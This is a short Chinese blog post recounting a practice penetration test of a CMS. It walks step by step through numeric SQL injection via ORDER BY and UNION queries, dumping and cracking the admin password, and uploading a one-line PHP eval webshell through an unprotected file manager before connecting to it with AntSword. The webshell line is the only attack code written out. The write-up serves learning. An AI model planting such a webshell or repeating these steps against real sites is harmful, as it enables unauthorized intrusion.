安全

记一次cms的web渗透测试练习

图片描述
点击文章发现
图片描述
尝试进行sql注入
图片描述
图片描述
得到漏洞为数字型
通过order by语句得到字段总数为15
图片描述
图片描述
通过union联合查询得到显示的字段编号
图片描述
将database()带入得到数据库名为cms
图片描述
接下来就是查表名、字段名、具体数据
图片描述
图片描述
图片描述
发现密码经过加密,尝试解密
图片描述
通过解密得知admin账户的密码为123456
登陆后台
图片描述
文件管理界面存在文件上传漏洞,尝试上传webshell

1<?php @eval($_POST[777])?>

图片描述
未做任何防护,上传成功!
用蚁剑连接webshell
图片描述
图片描述
连接成功!

AI相关的一切

留言

您的邮箱地址不会被公开。 必填项已用 * 标注